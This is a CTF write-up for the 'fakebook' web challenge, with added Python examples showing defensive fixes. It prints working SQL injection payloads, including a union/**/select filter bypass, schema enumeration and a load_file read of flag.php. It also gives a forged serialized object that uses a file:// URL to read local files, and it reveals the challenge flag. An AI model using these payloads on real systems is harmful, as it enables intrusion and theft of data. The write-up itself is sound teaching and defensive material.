攻防世界 Web Challenge Writeups [Advanced] (7)
Intro: a record of the solving process
22. fakebook
Challenge description: none
blog : www.baidu.com
- Visit:
http://111.200.241.244:56343/view.php?no=2'
[*] query error! (You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1)
Fatal error: Call to a member function fetch_assoc() on boolean in /var/www/html/db.php on line 66
- Probably SQL injection
- Both sqlmap and ordinary manual injection failed:
- Later learned that the string
union select
is filtered; bypass: use union/**/select
instead. - Also, after trying, the number of columns in the injected statement was found to be 4:
select 1,2,3,4
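The filter bypass above works because the blocklist matches the literal text "union select" and an inline comment breaks that match while the SQL parser still reads it as two keywords. The following added example (mine, not code from the challenge or the writeup) shows why the substring filter fails, what a normalizing filter catches, and why a bound parameter removes the need for a keyword filter at all. It assumes a SQLite in-memory table as a stand-in for the MariaDB users table, constructed sample rows, and a constructed set of inputs for the no parameter.

```python
import re
import sqlite3

# Constructed sample inputs for the "no" parameter (not from the original page).
# The first is a normal id; the rest carry a UNION payload in the spellings the
# writeup mentions plus a whitespace variant a substring blocklist also misses.
SAMPLE_INPUTS = [
    "2",
    "-1 union select 1,2,3",
    "-1 union/**/select 1,2,3",
    "-1 UNION\tSELECT 1,2,3",
]


def naive_filter_blocks(value: str) -> bool:
    """Substring blocklist of the kind the challenge appears to use."""
    return "union select" in value.lower()


def normalize_sql_fragment(value: str) -> str:
    """Strip /* ... */ comments and collapse whitespace so variants look alike."""
    no_comments = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", no_comments).strip().lower()


def normalized_filter_blocks(value: str) -> bool:
    """Same blocklist applied after normalization; catches union/**/select."""
    return "union select" in normalize_sql_fragment(value)


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the users table (constructed rows, not CTF data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (no INTEGER, username TEXT, data TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "profile-1"), (2, "bob", "profile-2")],
    )
    return conn


def lookup_concat(conn: sqlite3.Connection, no: str) -> list:
    """Vulnerable pattern: the parameter is spliced into the SQL text, so a
    UNION payload becomes part of the query and only the filter stands in the way."""
    return conn.execute(
        f"SELECT no, username, data FROM users WHERE no={no}"
    ).fetchall()


def lookup_param(conn: sqlite3.Connection, no: str) -> list:
    """Fixed pattern: validate the id's shape, then bind it as a parameter.
    The value never reaches the SQL parser as syntax, so no keyword filter is needed."""
    if not re.fullmatch(r"\d+", no):
        raise ValueError("no must be a non-negative integer")
    return conn.execute(
        "SELECT no, username, data FROM users WHERE no=?", (int(no),)
    ).fetchall()


def report(values=SAMPLE_INPUTS) -> list:
    """Per input: (value, naive filter blocks?, normalized filter blocks?, concat result)."""
    conn = make_db()
    return [
        (v, naive_filter_blocks(v), normalized_filter_blocks(v), lookup_concat(conn, v))
        for v in values
    ]


if __name__ == "__main__":
    for row in report():
        print(row)
```

Running the report shows the comment variant slipping past the naive filter and still returning the attacker-chosen row (1, 2, 3) from the concatenated query, while the normalized filter flags it; the parameterized lookup rejects anything that is not a plain integer before it ever touches the database.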
<1>. Find the injectable column positions:
view.php?no=-1 union/**/select 1,2,3,4
<2>. Dump the current database name:
view.php?no=-1 union/**/select 1,database(),3,4
- Current database name obtained:
fakebook
<3>. Get the table names from the database name:
view.php?no=-1 union/**/select 1,(SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.tables WHERE TABLE_SCHEMA="fakebook"),3,4
- Table name obtained:
users
<4>. Get the column names from the table name:
view.php?no=-1 union/**/select 1,(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'users'),3,4
- Column names obtained:
no,username,passwd,data,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS
<5>. Finally, get the column data from the column names:
view.php?no=-1 union/**/select 1,(SELECT GROUP_CONCAT(data) FROM fakebook.users),3,4
O:8:"UserInfo":3:{s:4:"name";s:3:"asd";s:3:"age";i:12;s:4:"blog";s:13:"www.baidu.com";}
<6>. Put the obtained data into the fourth column of the union query's result; it is parsed successfully.
view.php?no=-1 union/**/select 1,(SELECT GROUP_CONCAT(data) FROM fakebook.users),3,'O:8:"UserInfo":3:{s:4:"name";s:3:"asd";s:3:"age";i:12;s:4:"blog";s:13:"www.baidu.com";}'
- Scan the site with nikto:
nikto for windows (web scanning tool)
Reading file:///var/www/html/flag.php is enough:
view.php?no=-6 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:9;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
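The step above works because the blog field of the stored UserInfo object is fetched without checking its scheme, so a file:// value reads a local file. The following added example (mine, not code from the challenge or the writeup) shows the check a defender would put in front of that fetch: accept only http(s) URLs with a named, non-local host, and validate the profile's fields instead of trusting whatever came back from the database. It assumes the profile is stored as JSON rather than PHP serialize output, and uses the name/age/blog field names from the page; the sample profile strings are constructed.

```python
import ipaddress
import json
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def host_is_local(host: str) -> bool:
    """True for 'localhost' and loopback/private/link-local/reserved IP literals."""
    if host.lower() == "localhost":
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # a DNS name; resolving it is out of scope for this check
    return ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_reserved


def is_acceptable_blog_url(raw: str) -> bool:
    """Accept only http(s) URLs pointing at a named, non-local host."""
    raw = raw.strip()
    if "://" not in raw:
        raw = "http://" + raw  # the page stores bare hostnames like www.baidu.com
    parts = urlsplit(raw)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False  # rejects file://, gopher://, dict:// and friends
    host = parts.hostname
    if not host or parts.username or parts.password:
        return False
    return not host_is_local(host)


def parse_profile(stored: str) -> dict:
    """Assumed JSON replacement for the serialized UserInfo object.
    Every field is checked before use; a bad blog URL rejects the whole profile."""
    obj = json.loads(stored)
    if not isinstance(obj, dict) or set(obj) != {"name", "age", "blog"}:
        raise ValueError("unexpected profile shape")
    if not isinstance(obj["name"], str):
        raise ValueError("name must be a string")
    if not isinstance(obj["age"], int) or isinstance(obj["age"], bool):
        raise ValueError("age must be an integer")
    if not is_acceptable_blog_url(obj["blog"]):
        raise ValueError("blog url not allowed")
    return obj


# Constructed sample profiles: the first mirrors the page's stored record,
# the second the file:// value the writeup injects.
SAMPLE_OK = '{"name": "asd", "age": 12, "blog": "www.baidu.com"}'
SAMPLE_BAD = '{"name": "admin", "age": 9, "blog": "file:///var/www/html/flag.php"}'


if __name__ == "__main__":
    print(parse_profile(SAMPLE_OK))
    try:
        parse_profile(SAMPLE_BAD)
    except ValueError as e:
        print("rejected:", e)
```

The scheme allowlist is the part that stops the file:// read; the host check additionally blocks the loopback and metadata-style addresses a fetch-by-URL feature is commonly turned against. Storing the profile as JSON with an explicit shape check avoids handing attacker-controlled bytes to unserialize in the first place.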
- Visit:
view.php?no=0%20union/**/select%201,load_file(%27/var/www/html/flag.php%27),3,4
- Then right-click and view the page source; the flag can also be read there:
<td>
<?php
$flag = "flag{c1e552fdf77049fabf65168f22f7aeab}";
exit(0);
</td>
Article compiled by 极客之音; link: https://www.bmabk.com/index.php/post/92705.html